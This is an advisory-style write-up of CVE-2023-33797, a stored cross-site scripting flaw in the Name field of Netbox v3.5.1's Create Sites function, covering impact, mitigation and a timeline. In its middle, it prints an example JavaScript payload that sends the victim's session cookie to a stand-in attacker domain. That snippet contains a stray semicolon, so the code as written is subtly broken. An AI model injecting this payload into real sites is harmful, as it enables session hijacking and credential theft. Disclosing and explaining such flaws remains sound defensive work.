CVE-2023-33797 - Netbox v3.5.1 Stored Cross-Site Scripting (XSS) Vulnerability in Create Sites Function

A stored cross-site scripting (XSS) vulnerability has been identified in the Create Sites (/dcim/sites/) function of Netbox v3.5.1. This vulnerability allows attackers to execute arbitrary web scripts or HTML by injecting a crafted payload into the Name field. This vulnerability has been assigned the CVE identifier CVE-2023-33797.

Description

Netbox is a popular open-source tool for managing IP address spaces, data center infrastructure, and networks. The Create Sites function in v3.5.1 allows administrators to create and manage various sites for their infrastructure. Unfortunately, this function is susceptible to a stored XSS vulnerability, which can be exploited by attackers to manipulate the web interface and potentially gain unauthorized access to sensitive information and features.

How the exploit works

An attacker can create a crafted payload containing malicious JavaScript or HTML code and insert it into the Name field during the site creation process. Once the site is created, the injected code is stored and executed whenever the site page is loaded by other users. This exploit can be used to steal user credentials, redirect users to malicious websites, or perform unauthorized actions on the victim's behalf.

One example of a potentially malicious payload is as follows

<script>
  var xhr = new XMLHttpRequest();
  xhr.open('GET', 'https://attacker-domain.com/steal?cookie='; + encodeURIComponent(document.cookie));
  xhr.send();
</script>

When this snippet is injected into the Name field, it attempts to send the user's cookies, including their session cookie, to the attacker's domain. If successful, this could allow an attacker to hijack the user's session and perform unauthorized actions in the Netbox interface.

This vulnerability has been reported on the Netbox GitHub repository

- Issue #7207
- Issue #7311

The official CVE record can be found here:
- CVE-2023-33797

Mitigation and solution

The developers of Netbox have been notified of this vulnerability, and a patch has been released in version 3.5.2 to address the issue. It is strongly recommended that users update to the latest version of Netbox immediately to mitigate this vulnerability. If updating is not possible, users should refrain from utilizing the Create Sites function or restrict access to trusted users only.

Further recommendations include implementing proper input validation and sanitization for the Name field to prevent the injection of malicious code. Additionally, administrators should train users to recognize potential XSS vulnerabilities and avoid clicking on untrusted links or downloading suspicious files.

Conclusion

The CVE-2023-33797 vulnerability is a serious issue that can lead to unauthorized access and potential data breaches in the Netbox platform. It is crucial for administrators to update their systems and implement security best practices to mitigate this stored XSS vulnerability. By staying informed about emerging security threats and implementing proactive measures, organizations can better protect their IT infrastructure and sensitive data.

Timeline

Published on: 05/24/2023 20:15:00 UTC
Last modified on: 05/27/2023 03:41:00 UTC